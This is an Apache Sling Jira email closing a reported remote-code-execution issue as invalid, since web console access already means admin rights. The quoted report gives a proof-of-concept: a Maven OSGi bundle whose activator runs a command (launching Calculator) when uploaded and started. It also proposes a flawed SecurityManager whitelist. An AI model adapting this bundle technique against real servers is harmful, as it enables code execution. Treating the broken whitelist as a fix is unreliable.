[ https://issues.apache.org/jira/browse/SLING-11658?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
Robert Munteanu resolved SLING-11658. ------------------------------------- Resolution: Invalid Thank you for your report. In the future, please report security issues at secur...@sling.apache.org, following the process at https://sling.apache.org/project-information/security.html . We do not consider this to be a security issue, as accessing the web console already grants administrative privileges to all of Sling. > sling remote code execute > ------------------------- > > Key: SLING-11658 > URL: https://issues.apache.org/jira/browse/SLING-11658 > Project: Sling > Issue Type: Bug > Components: Console > Affects Versions: App CMS 1.1.2 > Environment: OpenJDK Runtime Environment (Zulu > 8.64.0.19-CA-macos-aarch64) (build 1.8.0_345-b01) > Reporter: QSec-Team > Priority: Major > Attachments: 1.png, 2.png > > > h1. Utilization process > > After Sling logs in,Osgi management function,You can obtain host control by > uploading the bundle component package. > !1.png! > > After uploading the malicious bundle package constructed by the > attacker,First click the "Refresh Package Imports" button, and then click the > "start" button,This will trigger the bundle group price loading, and the > malicious code will be executed. > !2.png! > > h1. Jar package construction: > > Create a new Maven project and add the following compilation options in > pom.xml: > {code:java} > <build> > <plugins> > <plugin> > <groupId>org.apache.maven.plugins</groupId> > <artifactId>maven-assembly-plugin</artifactId> > <configuration> > <descriptorRefs> > <descriptorRef>jar-with-dependencies</descriptorRef> > </descriptorRefs> > <archive> > <manifestEntries> > <Bundle-SymbolicName>shxjia</Bundle-SymbolicName> > <Bundle-Activator>jsx.ink.Main</Bundle-Activator> > <Bundle-Version>6.6.6</Bundle-Version> > </manifestEntries> > </archive> > </configuration> > </plugin> > </plugins> > </build> {code} > Create Main.java in the source code folder: > Note the "package jsx. ink;" in the source code It should correspond to the > Bundle Activator attribute in pom.xml. > {code:java} > package jsx.ink; > public class Main { > static { > try { > > Runtime.getRuntime().exec("/System/Applications/Calculator.app/Contents/MacOS/Calculator"); > } catch (Exception e) { > } > } > public static void main(String[] args) { System.out.println("Hello > world!"); > } > } {code} > After the code is written, enter the directory where pom.xml is located and > use the maven command to package: > {code:java} > mvn assembly:assembly -f pom.xml {code} > h1. > h1. Repair > > You can use securityManager to restrict some operations. > {code:java} > SecurityManager securityManager = new SecurityManager() { > @Override > public void checkExec(String cmd) { > List<String> whiteList = Arrays.asList("whoami,netstat"); > if (!whiteList.contains(cmd)) { > throw new RuntimeException("command execute denied!"); > } > super.checkExec(cmd); > } > }; > System.setSecurityManager(securityManager); {code} -- This message was sent by Atlassian Jira (v8.20.10#820010)